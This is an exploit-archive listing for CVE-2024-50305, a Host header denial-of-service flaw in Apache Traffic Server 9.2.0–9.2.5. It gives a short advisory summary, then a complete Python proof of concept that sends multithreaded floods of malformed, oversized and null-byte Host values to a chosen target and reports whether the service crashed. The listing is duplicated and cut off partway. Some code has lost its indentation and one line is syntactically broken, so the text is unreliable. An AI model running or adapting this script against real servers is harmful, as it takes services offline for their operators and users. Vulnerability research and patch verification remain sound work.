7.5
/ 10
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Description
Proof of concept remote denial of service exploit for Apache Traffic Server versions 9.2.0 through 9.2.5 that leverages the host header...
Basic Information
ID
PACKETSTORM:215923
Published
Feb 20, 2026 at 00:00
Affected Product
Affected Versions
=============================================================================================================================================
| # Title : Apache Traffic Server Host Header Denial of Service Vulnerability |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.3 (64 bits) |
| # Vendor : https://trafficserver.apache.org/ |
=============================================================================================================================================
[+] Summary : A denial-of-service (DoS) vulnerability, identified as CVE-2024-50305, affects Apache Traffic Server. It stems from improper handling and validation of malformed or unexpected Host header values in incoming HTTP requests.
An attacker may send specially crafted requests containing abnormal, oversized, or non-standard Host header values. Under certain conditions,
this may lead to service instability, excessive resource consumption, unexpected connection termination, or process crashes, resulting in a temporary denial of service.
The issue highlights insufficient input validation within the HTTP request-parsing logic. Proper boundary checks, strict header validation, and adherence to the relevant RFCs are recommended to mitigate the risk; operators running an affected release (9.2.0 through 9.2.5) should upgrade to a later, fixed version.
[+] POC :
#!/usr/bin/env python3
import socket
import sys
import time
import argparse
import threading
import ssl
import ipaddress
import random
import string
from concurrent.futures import ThreadPoolExecutor, as_completed
from typing import List, Tuple, Optional, Dict, Any
from enum import Enum
from dataclasses import dataclass, field
from contextlib import contextmanager
import logging
from collections import Counter
# Root logging is configured once at import time: INFO level, with a
# time-of-day stamp, logger name and level in front of every message.
_LOG_FORMAT = '%(asctime)s - %(name)s - %(levelname)s - %(message)s'
_LOG_DATE_FORMAT = '%H:%M:%S'
logging.basicConfig(level=logging.INFO, format=_LOG_FORMAT, datefmt=_LOG_DATE_FORMAT)

# Single named logger shared by everything in this script.
logger = logging.getLogger('cve_2024_50305')
class ServiceState(Enum):
    """Classification of the target service after a probe.

    The member value is the lowercase label used when a state is printed.
    """

    # A response with a parseable status code was received.
    UP = "up"
    # The connection attempt was refused.
    DOWN = "down"
    # Connected, but no parseable status line came back (or the peer reset).
    UNKNOWN = "unknown"
    # Reserved: nothing in this script currently returns it.
    FILTERED = "filtered"
    # A socket operation timed out.
    SLOW = "slow"
    # Name-resolution failure or any other unexpected exception.
    ERROR = "error"
class Protocol(Enum):
    """HTTP protocol family inferred from a response's version token."""

    # Version token begins with "HTTP/1".
    HTTP1 = "http/1.1"
    # Version token begins with "HTTP/2".
    HTTP2 = "http/2"
    # Anything else.
    UNKNOWN = "unknown"
class CrashConfidence(Enum):
    """How strongly a single request's outcome suggests the peer failed."""

    # The connection was reset or the pipe broke.
    HIGH = "high"
    # The read timed out and not a single byte had arrived.
    MEDIUM = "medium"
    # Nothing was received without an error, or the reply had no parseable
    # status line.
    LOW = "low"
    # No indication of a failure (also the default).
    NONE = "none"
@dataclass
class RequestResult:
    """Everything recorded about one request/response exchange."""

    # Host header value that was sent with the request.
    payload: str
    # Elapsed wall time in seconds, measured with time.monotonic().
    response_time: float
    # Status code parsed from the reply, or None if none could be parsed.
    status_code: Optional[int] = None
    # Heuristic verdict for this exchange.
    crash_confidence: CrashConfidence = CrashConfidence.NONE
    # Short error description; None when no error was recorded.
    error: Optional[str] = None
    # True when a read hit the socket timeout.
    timeout_occurred: bool = False
    # Number of response bytes read.
    bytes_received: int = 0
    # True when the peer reset the connection.
    connection_reset: bool = False
@dataclass
class Statistics:
    """Running totals for a whole run.

    Only aggregates are kept (counters plus sum/count/min/max of response
    times), so the record's size does not grow with the number of requests.
    """

    # --- request outcome counters ---
    total_requests: int = 0
    crashes_high: int = 0
    crashes_medium: int = 0
    crashes_low: int = 0
    timeouts: int = 0
    connection_refused: int = 0
    connection_reset: int = 0
    successful: int = 0
    errors: int = 0
    # Histogram of observed status codes; a fresh Counter per instance.
    status_codes: Counter = field(default_factory=Counter)

    # --- response-time aggregates, in seconds ---
    response_time_sum: float = 0.0
    response_time_count: int = 0
    # Starts at +inf so the first sample always becomes the minimum.
    response_time_min: float = float('inf')
    response_time_max: float = 0.0
class HTTPResponseParser:
    """Minimal parser for the status line of an HTTP response."""

    @staticmethod
    def parse_status_line(data: bytes) -> Tuple[Optional[int], Optional[Protocol]]:
        """Extract the status code and protocol family from raw response bytes.

        Args:
            data: Bytes received from the peer, beginning with the first byte
                of the response.

        Returns:
            ``(status_code, protocol)`` on success.
            ``(None, None)`` when ``data`` is empty, contains no CRLF, or the
            first line has fewer than two space-separated fields.
            ``(None, protocol)`` when the first field is not an ``HTTP/``
            version token or the second field is not a three-digit code.
        """
        if not data:
            return None, None

        line_end = data.find(b'\r\n')
        if line_end == -1:
            return None, None

        fields = data[:line_end].decode('ascii', errors='ignore').split(' ')
        if len(fields) < 2:
            return None, None
        version, code = fields[0], fields[1]

        if version.startswith('HTTP/1'):
            protocol = Protocol.HTTP1
        elif version.startswith('HTTP/2'):
            protocol = Protocol.HTTP2
        else:
            protocol = Protocol.UNKNOWN

        # A status line must open with an HTTP version token; without this
        # check any "<word> <number>" banner from a non-HTTP service would be
        # reported as a valid HTTP status.
        if not version.startswith('HTTP/'):
            return None, protocol

        # Status codes are exactly three digits; reject signs, padding and
        # over-long numbers that int() alone would accept.
        if len(code) != 3 or not code.isdigit():
            return None, protocol

        return int(code), protocol
class TargetResolver:
    """Turn a hostname or IP literal into a connectable ``(ip, port, family)``.

    Answers are memoised per ``(target, port, prefer_ipv6)`` for the lifetime
    of the instance.
    """

    def __init__(self, prefer_ipv6: bool = False):
        self.prefer_ipv6 = prefer_ipv6
        self._cache = {}

    def _is_ip_address(self, target: str) -> Tuple[bool, Optional[int]]:
        """Report whether ``target`` is an IP literal and, if so, its family.

        Returns:
            ``(True, socket.AF_INET)`` or ``(True, socket.AF_INET6)`` for a
            literal, ``(False, None)`` for anything else.
        """
        try:
            version = ipaddress.ip_address(target).version
        except ValueError:
            return False, None
        return True, (socket.AF_INET6 if version == 6 else socket.AF_INET)

    def resolve(self, target: str, port: int) -> Optional[Tuple[str, int, int]]:
        """Resolve ``target`` to ``(ip, port, socket_family)``.

        IP literals are returned unchanged without a lookup. Hostnames are
        looked up one address family at a time, in the preferred order, and
        the first address of the first family that answers is used.

        Returns:
            The resolved triple, or ``None`` when no family produced a result.
        """
        key = f"{target}:{port}:{self.prefer_ipv6}"
        if key in self._cache:
            return self._cache[key]

        literal, literal_family = self._is_ip_address(target)
        if literal:
            answer = (target, port, literal_family)
            self._cache[key] = answer
            return answer

        v4_then_v6 = [socket.AF_INET, socket.AF_INET6]
        lookup_order = v4_then_v6[::-1] if self.prefer_ipv6 else v4_then_v6

        for family in lookup_order:
            try:
                candidates = socket.getaddrinfo(
                    target,
                    port,
                    family=family,
                    type=socket.SOCK_STREAM,
                    proto=socket.IPPROTO_TCP,
                )
                if not candidates:
                    continue
                sockaddr = candidates[0][4]
                # IPv6 socket addresses carry flowinfo and scope id as well.
                if family == socket.AF_INET6:
                    resolved_ip, resolved_port, _flowinfo, _scopeid = sockaddr
                else:
                    resolved_ip, resolved_port = sockaddr
                answer = (resolved_ip, resolved_port, family)
                self._cache[key] = answer
                label = 'IPv6' if family == socket.AF_INET6 else 'IPv4'
                logger.debug(f"Resolved {target} -> {resolved_ip} ({label})")
                return answer
            except socket.gaierror:
                # No record for this family; try the next one.
                continue
            except Exception as e:
                logger.debug(f"Error resolving {target} using family {family}: {e}")
                continue

        logger.error(f"Failed to resolve {target}")
        return None
class ServiceChecker:
    """Probe an endpoint with a well-formed ``GET /`` and classify the result.

    Args:
        timeout: Per-operation socket timeout in seconds.
        max_header_size: Upper bound on the bytes read while waiting for the
            end of the response header.
    """

    def __init__(self, timeout: float = 5, max_header_size: int = 8192):
        self.timeout = timeout
        self.max_header_size = max_header_size

    @staticmethod
    def _sni_name(hostname: Optional[str]) -> Optional[str]:
        """Return ``hostname`` when it is a DNS name; ``None`` for IP literals or empty input."""
        if not hostname:
            return None
        try:
            ipaddress.ip_address(hostname)
        except ValueError:
            return hostname
        return None

    @staticmethod
    def _host_header(ip: str, family: int, hostname: Optional[str]) -> str:
        """Return the Host header value: the hostname if given, else the IP (IPv6 bracketed)."""
        if hostname:
            return hostname
        if family == socket.AF_INET6 and ':' in ip and not ip.startswith('['):
            return f"[{ip}]"
        return ip

    @contextmanager
    def _create_socket(self, family: int, use_ssl: bool = False,
                       hostname: Optional[str] = None):
        """Yield an unconnected socket (TLS-wrapped on request), closing it on exit.

        Args:
            family: ``socket.AF_INET`` or ``socket.AF_INET6``.
            use_ssl: Wrap the socket in TLS before it is connected.
            hostname: Name offered via SNI; IP literals are not sent as SNI.
        """
        sock = socket.socket(family, socket.SOCK_STREAM)
        sock.settimeout(self.timeout)
        try:
            if use_ssl:
                context = ssl.create_default_context()
                # NOTE: certificate and hostname verification are switched
                # off, so the peer is not authenticated. check_hostname has to
                # be cleared first or assigning CERT_NONE raises ValueError.
                context.check_hostname = False
                context.verify_mode = ssl.CERT_NONE
                sock = context.wrap_socket(
                    sock, server_hostname=self._sni_name(hostname))
            yield sock
        finally:
            try:
                sock.close()
            except OSError:
                # Best-effort cleanup; a failed close must not mask the
                # outcome of the probe itself.
                pass

    def _is_valid_http_response(self, data: bytes) -> Tuple[bool, Optional[int]]:
        """Return ``(has_status_code, status_code)`` for the raw response bytes."""
        status_code, _ = HTTPResponseParser.parse_status_line(data)
        return status_code is not None, status_code

    def _read_header(self, sock) -> bytes:
        """Read until the blank line ending the header, EOF, a timeout, or the size cap."""
        response = b""
        while True:
            try:
                chunk = sock.recv(self.max_header_size)
            except socket.timeout:
                break
            if not chunk:
                break
            response += chunk
            if b'\r\n\r\n' in response or len(response) > self.max_header_size:
                break
        return response

    def check(self, ip: str, port: int, family: int,
              hostname: Optional[str] = None,
              use_ssl: bool = False) -> Tuple[ServiceState, float, Optional[int]]:
        """Send one ``GET /`` and report how the service answered.

        Args:
            ip: Address to connect to.
            port: TCP port to connect to.
            family: ``socket.AF_INET`` or ``socket.AF_INET6``.
            hostname: Name to use for the Host header and SNI. When omitted,
                the IP is used (bracketed for IPv6).
            use_ssl: Speak TLS instead of plain TCP.

        Returns:
            ``(state, response_time_seconds, status_code)``:
            ``UP`` with the status code when a status line was parsed;
            ``UNKNOWN`` when connected but no status line was parsed, or the
            peer reset the connection;
            ``SLOW`` (with the configured timeout as the time) when
            connecting or sending timed out;
            ``DOWN`` when the connection was refused;
            ``ERROR`` for resolution failures and any other exception.
        """
        start_time = time.monotonic()
        try:
            with self._create_socket(family, use_ssl, hostname or ip) as sock:
                host_header = self._host_header(ip, family, hostname)
                request = (
                    f"GET / HTTP/1.1\r\n"
                    f"Host: {host_header}\r\n"
                    f"User-Agent: CVE-2024-50305-Checker/1.0\r\n"
                    f"Accept: text/html,application/xhtml+xml\r\n"
                    f"Accept-Language: en-US,en;q=0.9\r\n"
                    f"Connection: close\r\n"
                    f"\r\n"
                ).encode()

                # IPv6 socket addresses also need flowinfo and scope id.
                if family == socket.AF_INET6:
                    sock.connect((ip, port, 0, 0))
                else:
                    sock.connect((ip, port))
                sock.sendall(request)

                response = self._read_header(sock)
                response_time = time.monotonic() - start_time

                _, status_code = self._is_valid_http_response(response)
                if status_code is not None:
                    return ServiceState.UP, response_time, status_code
                return ServiceState.UNKNOWN, response_time, None
        except socket.timeout:
            return ServiceState.SLOW, self.timeout, None
        except ConnectionRefusedError:
            return ServiceState.DOWN, 0, None
        except ConnectionResetError:
            return ServiceState.UNKNOWN, time.monotonic() - start_time, None
        except socket.gaierror:
            return ServiceState.ERROR, 0, None
        except Exception as e:
            logger.debug(f"Check Error: {e}")
            return ServiceState.ERROR, 0, None
class RequestSender:
"""Sends malicious requests with detailed result analysis"""
def __init__(self, timeout: float = 5, max_response_size: int = 4096):
self.timeout = timeout
self.max_response_size = max_response_size
@contextmanager
def _create_socket(self, family: int):
"""Creates a socket"""
sock = socket.socket(family, socket.SOCK_STREAM)
sock.settimeout(self.timeout)
try:
yield sock
finally:
try:
sock.close()
except:
pass
def _evaluate_crash_confidence(self, result: RequestResult,
normal_behavior: Dict) -> CrashConfidence:
"""
Evaluates crash detection confidence based on several factors
"""
if result.connection_reset:
return CrashConfidence.HIGH
if result.timeout_occurred and result.bytes_received == 0:
return CrashConfidence.MEDIUM
if result.bytes_received == 0 and not result.error:
return CrashConfidence.LOW
return CrashConfidence.NONE
def send(self, ip: str, port: int, family: int,
host_payload: str, baseline_time: float = 1.0) -> RequestResult:
"""
Sends a malicious request with accurate result analysis
Args:
baseline_time: Normal service response time
"""
result = RequestResult(payload=host_payload, response_time=0.0)
start_time = time.monotonic()
try:
with self._create_socket(family) as sock:
try:
if family == socket.AF_INET6:
sock.connect((ip, port, 0, 0))
else:
sock.connect((ip, port))
except ConnectionRefusedError:
result.error = "connection_refused"
result.response_time = time.monotonic() - start_time
return result
try:
encoded_host = host_payload.encode('utf-8')
except UnicodeEncodeError:
encoded_host = host_payload.encode('ascii', errors='replace')
request = (
b"GET / HTTP/1.1\r\n"
b"Host: " + encoded_host + b"\r\n"
b"User-Agent: CVE-2024-50305/1.0\r\n"
b"Accept: */*\r\n"
b"Connection: close\r\n"
b"\r\n"
)
try:
sock.sendall(request)
except ConnectionResetError:
result.connection_reset = True
result.response_time = time.monotonic() - start_time
result.crash_confidence = CrashConfidence.HIGH
return result
except BrokenPipeError:
result.connection_reset = True
result.response_time = time.monotonic() - start_time
result.crash_confidence = CrashConfidence.HIGH
response = b""
try:
while True:
try:
chunk = sock.recv(4096)
if not chunk:
break
response += chunk
if len(response) > self.max_response_size:
break
except socket.timeout:
result.timeout_occurred = True
break
except ConnectionResetError:
result.connection_reset = True
result.crash_confidence = CrashConfidence.HIGH
result.response_time = time.monotonic() - start_time
result.bytes_received = len(response)
if response:
status_code, _ = HTTPResponseParser.parse_status_line(response)
result.status_code = status_code
if status_code is not None:
result.crash_confidence = CrashConfidence.NONE
else:
result.crash_confidence = CrashConfidence.LOW
if result.crash_confidence == CrashConfidence.NONE:
result.crash_confidence = self._evaluate_crash_confidence(result, {})
except Exception as e:
result.error = str(e)
result.response_time = time.monotonic() - start_time
return result
class PayloadGenerator:
"""Generates malicious Host values"""
BASE_PAYLOADS = [
":", "::", "[::1]", "", "\0",
"localhost:8080:extra", "host\x00injection",
]
SPECIAL_CHARS = list(string.punctuation + string.whitespace)
@classmethod
def generate(cls, count: int = 30) -> List[str]:
"""Generates a list of payloads"""
count = max(10, min(count, 100))
payloads = set(cls.BASE_PAYLOADS)
for length in [100, 500, 1000, 2000, 5000]:
if len(payloads) < count:
payloads.add('A' * length)
payloads.add('B' * length)
random_needed = count - len(payloads)
if random_needed > 0:
for _ in range(random_needed):
length = random.randint(5, 50)
random_payload = ''.join(random.choices(cls.SPECIAL_CHARS, k=length))
payloads.add(random_payload)
unicode_samples = ["🚀", "测试", "αβγ", "★", "🌍"]
payloads.update(unicode_samples[:max(0, count - len(payloads))])
return list(payloads)[:count]
class StatisticsCollector:
    """Accumulate per-request results into a ``Statistics`` record under a lock.

    Args:
        max_response_times: Cap on how many individual response times are
            kept in the internal sample list.
    """

    def __init__(self, max_response_times: int = 1000):
        self.lock = threading.Lock()
        self.stats = Statistics()
        self.max_response_times = max_response_times
        # Bounded sample of raw response times; stops growing at the cap.
        self._response_times_sample = []

    def add_result(self, result: RequestResult):
        """Fold one request result into the running totals."""
        with self.lock:
            stats = self.stats
            stats.total_requests += 1

            confidence = result.crash_confidence
            if confidence == CrashConfidence.HIGH:
                stats.crashes_high += 1
            elif confidence == CrashConfidence.MEDIUM:
                stats.crashes_medium += 1
            elif confidence == CrashConfidence.LOW:
                stats.crashes_low += 1

            # A result is counted in at most one of these three buckets.
            if result.error == "connection_refused":
                stats.connection_refused += 1
            elif result.connection_reset:
                stats.connection_reset += 1
            elif result.error:
                stats.errors += 1

            if result.timeout_occurred:
                stats.timeouts += 1

            if result.status_code is not None:
                stats.successful += 1
                stats.status_codes[result.status_code] += 1

            elapsed = result.response_time
            if elapsed > 0:
                stats.response_time_sum += elapsed
                stats.response_time_count += 1
                stats.response_time_min = min(stats.response_time_min, elapsed)
                stats.response_time_max = max(stats.response_time_max, elapsed)
                if len(self._response_times_sample) < self.max_response_times:
                    self._response_times_sample.append(elapsed)

    def get_stats(self) -> Statistics:
        """Return an independent snapshot of the current totals."""
        with self.lock:
            current = self.stats
            return Statistics(
                total_requests=current.total_requests,
                crashes_high=current.crashes_high,
                crashes_medium=current.crashes_medium,
                crashes_low=current.crashes_low,
                timeouts=current.timeouts,
                connection_refused=current.connection_refused,
                connection_reset=current.connection_reset,
                successful=current.successful,
                errors=current.errors,
                # Copied so later updates do not leak into the snapshot.
                status_codes=current.status_codes.copy(),
                response_time_sum=current.response_time_sum,
                response_time_count=current.response_time_count,
                response_time_min=current.response_time_min,
                response_time_max=current.response_time_max,
            )

    def get_average_response_time(self) -> float:
        """Return the mean response time in seconds, or 0.0 with no samples."""
        # Sum and count are read under the lock so they always belong to the
        # same set of samples even while other threads are adding results.
        with self.lock:
            count = self.stats.response_time_count
            if count > 0:
                return self.stats.response_time_sum / count
            return 0.0
class CVE202450305Exploit:
"""Main exploit class"""
def __init__(self, target: str, port: int = 80, threads: int = 5,
timeout: float = 5, prefer_ipv6: bool = False,
use_ssl: bool = False, rate_limit: float = 0.1):
if not 1 <= port <= 65535:
raise ValueError(f"Invalid port number: {port}")
if threads < 1 or threads > 100:
raise ValueError(f"Thread count must be between 1 and 100")
self.target = target
self.port = port
self.threads = threads
self.timeout = timeout
self.prefer_ipv6 = prefer_ipv6
self.use_ssl = use_ssl
self.rate_limit = rate_limit
self.resolver = TargetResolver(prefer_ipv6)
self.checker = ServiceChecker(timeout)
self.sender = RequestSender(timeout)
self.stats = StatisticsCollector()
self.target_ip = None
self.target_family = None
self.baseline_state = ServiceState.UNKNOWN
self.baseline_time = 1.0 # Default value
self.baseline_status = None
self.is_ip_target = False
def initialize(self) -> bool:
"""Initializes exploit and resolves target"""
logger.info(f"Initializing exploit for target {self.target}:{self.port}")
resolved = self.resolver.resolve(self.target, self.port)
if not resolved:
logger.error("Failed to resolve target")
return False
self.target_ip, _, self.target_family = resolved
try:
ipaddress.ip_address(self.target)
self.is_ip_target = True
except ValueError:
self.is_ip_target = False
logger.info(f"Target resolved: {self.target_ip} "
f"({'IPv6' if self.target_family == socket.AF_INET6 else 'IPv4'})")
logger.info("Performing baseline service check...")
state, resp_time, status = self.checker.check(
self.target_ip, self.port, self.target_family,
hostname=self.target if not self.is_ip_target else None,
use_ssl=self.use_ssl
)
self.baseline_state = state
if resp_time > 0:
self.baseline_time = resp_time
self.baseline_status = status
if state == ServiceState.UP:
logger.info(f" Service is UP (Code: {status}, Time: {resp_time:.3f}s)")
return True
elif state == ServiceState.SLOW:
logger.warning(f" Service is SLOW (Time: {resp_time:.3f}s)")
return True
elif state == ServiceState.UNKNOWN:
logger.warning(f" Service status is UNKNOWN")
return True
else:
logger.error(f" Service is NOT running: {state.value}")
return False
def _process_payload_chunk(self, payloads: List[str], iteration: int,
chunk_idx: int) -> List[RequestResult]:
"""Processes a subset of payloads"""
results = []
with ThreadPoolExecutor(max_workers=self.threads) as executor:
future_to_payload = {}
for payload in payloads:
if self.rate_limit > 0:
time.sleep(self.rate_limit)
future = executor.submit(
self.sender.send,
self.target_ip,
self.port,
self.target_family,
payload,
self.baseline_time
)
future_to_payload[future] = payload
for future in as_completed(future_to_payload):
try:
result = future.result(timeout=self.timeout + 2)
results.append(result)
self.stats.add_result(result)
if result.crash_confidence == CrashConfidence.HIGH:
logger.info(f" HIGH confidence crash: {repr(result.payload)[:50]}...")
elif result.crash_confidence == CrashConfidence.MEDIUM:
logger.debug(f" MEDIUM confidence: {repr(result.payload)[:50]}...")
elif result.connection_reset:
logger.debug(f" Connection reset: {repr(result.payload)[:50]}...")
elif result.timeout_occurred:
logger.debug(f" Timeout: {repr(result.payload)[:50]}...")
except Exception as e:
logger.error(f"Error processing result: {e}")
return results
def run(self, payload_count: int = 30, iterations: int = 3) -> Tuple[bool, Statistics]:
"""
Executes the attack
Returns:
(Exploit_Success, Statistics)
"""
logger.info("=" * 60)
logger.info(" CVE-2024-50305 - Apache Traffic Server DoS Exploit")
logger.info("=" * 60)
logger.info(f"Target: {self.target} ({self.target_ip}:{self.port})")
logger.info(f"Protocol: {'HTTPS' if self.use_ssl else 'HTTP'}")
logger.info(f"Threads: {self.threads}, Timeout: {self.timeout}s")
logger.info(f"Rate limit: {self.rate_limit}s")
logger.info(f"Payloads: {payload_count}, Iterations: {iterations}")
logger.info("=" * 60)
payloads = PayloadGenerator.generate(payload_count)
logger.info(f" Generated {len(payloads)} malicious Host values")
all_results = []
for iteration in range(iterations):
logger.info(f"\n Iteration {iteration + 1}/{iterations}")
chunk_size = max(1, len(payloads)
chunks = [payloads[i:i+chunk_size] for i in range(0, len(payloads), chunk_size)]
for chunk_idx, chunk in enumerate(chunks):
logger.debug(f" Processing chunk {chunk_idx + 1}/{len(chunks)}")
results = self._process_payload_chunk(chunk, iteration, chunk_idx)
all_results.extend(results)
stats = self.stats.get_stats()
logger.info(f" Progress: {stats.total_requests}/{iterations * len(payloads)} "
f"(High: {stats.crashes_high}, Med: {stats.crashes_medium})")
if chunk_idx < len(chunks) - 1:
time.sleep(1)
final_stats = self.stats.get_stats()
avg_time = self.stats.get_average_response_time()
logger.info("\n" + "=" * 60)
logger.info(" Final Statistics:")
logger.info(f" Total Requests: {final_stats.total_requests}")
logger.info(f" HIGH confidence crashes: {final_stats.crashes_high}")
logger.info(f" MEDIUM confidence crashes: {final_stats.crashes_medium}")
logger.info(f" LOW confidence crashes: {final_stats.crashes_low}")
logger.info(f" Timeouts: {final_stats.timeouts}")
logger.info(f" Connection resets: {final_stats.connection_reset}")
logger.info(f" Connection refused: {final_stats.connection_refused}")
logger.info(f" Successful responses: {final_stats.successful}")
if final_stats.status_codes:
logger.info(f" Status Codes: {dict(final_stats.status_codes)}")
if final_stats.response_time_count > 0:
logger.info(f" Response Time - Avg: {avg_time:.3f}s")
logger.info(f" Response Time - Min: {final_stats.response_time_min:.3f}s")
logger.info(f" Response Time - Max: {final_stats.response_time_max:.3f}s")
logger.info("=" * 60)
logger.info("\n Verifying exploit success...")
time.sleep(3)
post_state, post_time, post_status = self.checker.check(
self.target_ip, self.port, self.target_family,
hostname=self.target if not self.is_ip_target else None,
use_ssl=self.use_ssl
)
success = False
reasons = []
if final_stats.crashes_high > 0:
reasons.append(f"Detected {final_stats.crashes_high} HIGH confidence crashes")
success = True
if final_stats.crashes_medium > 3:
reasons.append(f"Detected {final_stats.crashes_medium} MEDIUM confidence crashes")
success = True
if self.baseline_state == ServiceState.UP:
if post_state == ServiceState.DOWN:
reasons.append("Service stopped after attack")
success = True
elif post_state == ServiceState.SLOW and self.baseline_time > 0:
slowdown_ratio = post_time / self.baseline_time
if slowdown_ratio > 3:
reasons.append(f"Significant service slowdown ({slowdown_ratio:.1f}x)")
success = True
if success:
logger.info("Exploit Successful!")
for reason in reasons:
logger.info(f" • {reason}")
return True, final_stats
else:
logger.info(" Exploit Failed")
if reasons:
logger.info(f" ({', '.join(reasons)})")
else:
logger.info(" No evidence of vulnerability found")
return False, final_stats
def main():
"""Main function"""
parser = argparse.ArgumentParser(
description="CVE-2024-50305 - Apache Traffic Server DoS Exploit",
formatter_class=argparse.RawDescriptionHelpFormatter
)
parser.add_argument("target", help="Target address (IP or domain)")
parser.add_argument("-p", "--port", type=int, default=80,
help="Target port (1-65535, default: 80)")
parser.add_argument("-t", "--threads", type=int, default=5,
help="Thread count (1-100, default: 5)")
parser.add_argument("--timeout", type=float, default=5,
help="Connection timeout in seconds (default: 5)")
parser.add_argument("--ipv6", action="store_true",
help="Prefer IPv6")
parser.add_argument("--ssl", action="store_true",
help="Use HTTPS/SSL")
parser.add_argument("--rate-limit", type=float, default=0.05,
help="Delay between requests in seconds (default: 0.05)")
parser.add_argument("-c", "--payloads", type=int, default=30,
help="Number of payloads to test (10-100, default: 30)")
parser.add_argument("-i", "--iterations", type=int, default=3,
help="Number of iterations (default: 3)")
parser.add_argument("-v", "--verbose", action="store_true",
help="Show detailed information")
args = parser.parse_args()
if args.verbose:
logger.setLevel(logging.DEBUG)
try:
exploit = CVE202450305Exploit(
target=args.target,
port=args.port,
threads=args.threads,
timeout=args.timeout,
prefer_ipv6=args.ipv6,
use_ssl=args.ssl,
rate_limit=args.rate_limit
)
if not exploit.initialize():
sys.exit(2)
success, stats = exploit.run(
payload_count=args.payloads,
iterations=args.iterations
)
sys.exit(0 if success else 1)
except KeyboardInterrupt:
logger.info("\nAttack stopped by user")
sys.exit(2)
except ValueError as e:
logger.error(f"Input Error: {e}")
sys.exit(2)
except Exception as e:
logger.error(f"Unexpected Error: {e}")
if args.verbose:
import traceback
traceback.print_exc()
sys.exit(2)
if __name__ == "__main__":
main()
Greetings to :======================================================================
jericho * Larry W. Cashdollar * r00t * Hussin-X * Malvuln (John Page aka hyp3rlinx)|
====================================================================================
| # Title : Apache Traffic Server Host Header Denial of Service Vulnerability |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.3 (64 bits) |
| # Vendor : https://trafficserver.apache.org/ |
=============================================================================================================================================
[+] Summary : A denial-of-service (DoS) vulnerability, identified as CVE-2024-50305, affects Apache Traffic Server. It stems from improper handling and validation of malformed or unexpected Host header values in incoming HTTP requests.
An attacker may send specially crafted requests containing abnormal, oversized, or non-standard Host header values. Under certain conditions,
this may lead to service instability, excessive resource consumption, unexpected connection termination, or process crashes, resulting in a temporary denial of service.
The issue highlights insufficient input validation within the HTTP request-parsing logic. Proper boundary checks, strict header validation, and adherence to the relevant RFCs are recommended to mitigate the risk; operators running an affected release (9.2.0 through 9.2.5) should upgrade to a later, fixed version.
[+] POC :
#!/usr/bin/env python3
import socket
import sys
import time
import argparse
import threading
import ssl
import ipaddress
import random
import string
from concurrent.futures import ThreadPoolExecutor, as_completed
from typing import List, Tuple, Optional, Dict, Any
from enum import Enum
from dataclasses import dataclass, field
from contextlib import contextmanager
import logging
from collections import Counter
# Root logging is configured once at import time: INFO level, with a
# time-of-day stamp, logger name and level in front of every message.
_LOG_FORMAT = '%(asctime)s - %(name)s - %(levelname)s - %(message)s'
_LOG_DATE_FORMAT = '%H:%M:%S'
logging.basicConfig(level=logging.INFO, format=_LOG_FORMAT, datefmt=_LOG_DATE_FORMAT)

# Single named logger shared by everything in this script.
logger = logging.getLogger('cve_2024_50305')
class ServiceState(Enum):
    """Classification of the target service after a probe.

    The member value is the lowercase label used when a state is printed.
    """

    # A response with a parseable status code was received.
    UP = "up"
    # The connection attempt was refused.
    DOWN = "down"
    # Connected, but no parseable status line came back (or the peer reset).
    UNKNOWN = "unknown"
    # Reserved: nothing in this script currently returns it.
    FILTERED = "filtered"
    # A socket operation timed out.
    SLOW = "slow"
    # Name-resolution failure or any other unexpected exception.
    ERROR = "error"
class Protocol(Enum):
    """HTTP protocol family inferred from a response's version token."""

    # Version token begins with "HTTP/1".
    HTTP1 = "http/1.1"
    # Version token begins with "HTTP/2".
    HTTP2 = "http/2"
    # Anything else.
    UNKNOWN = "unknown"
class CrashConfidence(Enum):
    """How strongly a single request's outcome suggests the peer failed."""

    # The connection was reset or the pipe broke.
    HIGH = "high"
    # The read timed out and not a single byte had arrived.
    MEDIUM = "medium"
    # Nothing was received without an error, or the reply had no parseable
    # status line.
    LOW = "low"
    # No indication of a failure (also the default).
    NONE = "none"
@dataclass
class RequestResult:
    """Everything recorded about one request/response exchange."""

    # Host header value that was sent with the request.
    payload: str
    # Elapsed wall time in seconds, measured with time.monotonic().
    response_time: float
    # Status code parsed from the reply, or None if none could be parsed.
    status_code: Optional[int] = None
    # Heuristic verdict for this exchange.
    crash_confidence: CrashConfidence = CrashConfidence.NONE
    # Short error description; None when no error was recorded.
    error: Optional[str] = None
    # True when a read hit the socket timeout.
    timeout_occurred: bool = False
    # Number of response bytes read.
    bytes_received: int = 0
    # True when the peer reset the connection.
    connection_reset: bool = False
@dataclass
class Statistics:
    """Running totals for a whole run.

    Only aggregates are kept (counters plus sum/count/min/max of response
    times), so the record's size does not grow with the number of requests.
    """

    # --- request outcome counters ---
    total_requests: int = 0
    crashes_high: int = 0
    crashes_medium: int = 0
    crashes_low: int = 0
    timeouts: int = 0
    connection_refused: int = 0
    connection_reset: int = 0
    successful: int = 0
    errors: int = 0
    # Histogram of observed status codes; a fresh Counter per instance.
    status_codes: Counter = field(default_factory=Counter)

    # --- response-time aggregates, in seconds ---
    response_time_sum: float = 0.0
    response_time_count: int = 0
    # Starts at +inf so the first sample always becomes the minimum.
    response_time_min: float = float('inf')
    response_time_max: float = 0.0
class HTTPResponseParser:
    """Minimal parser for the status line of an HTTP response."""

    @staticmethod
    def parse_status_line(data: bytes) -> Tuple[Optional[int], Optional[Protocol]]:
        """Extract the status code and protocol family from raw response bytes.

        Args:
            data: Bytes received from the peer, beginning with the first byte
                of the response.

        Returns:
            ``(status_code, protocol)`` on success.
            ``(None, None)`` when ``data`` is empty, contains no CRLF, or the
            first line has fewer than two space-separated fields.
            ``(None, protocol)`` when the first field is not an ``HTTP/``
            version token or the second field is not a three-digit code.
        """
        if not data:
            return None, None

        line_end = data.find(b'\r\n')
        if line_end == -1:
            return None, None

        fields = data[:line_end].decode('ascii', errors='ignore').split(' ')
        if len(fields) < 2:
            return None, None
        version, code = fields[0], fields[1]

        if version.startswith('HTTP/1'):
            protocol = Protocol.HTTP1
        elif version.startswith('HTTP/2'):
            protocol = Protocol.HTTP2
        else:
            protocol = Protocol.UNKNOWN

        # A status line must open with an HTTP version token; without this
        # check any "<word> <number>" banner from a non-HTTP service would be
        # reported as a valid HTTP status.
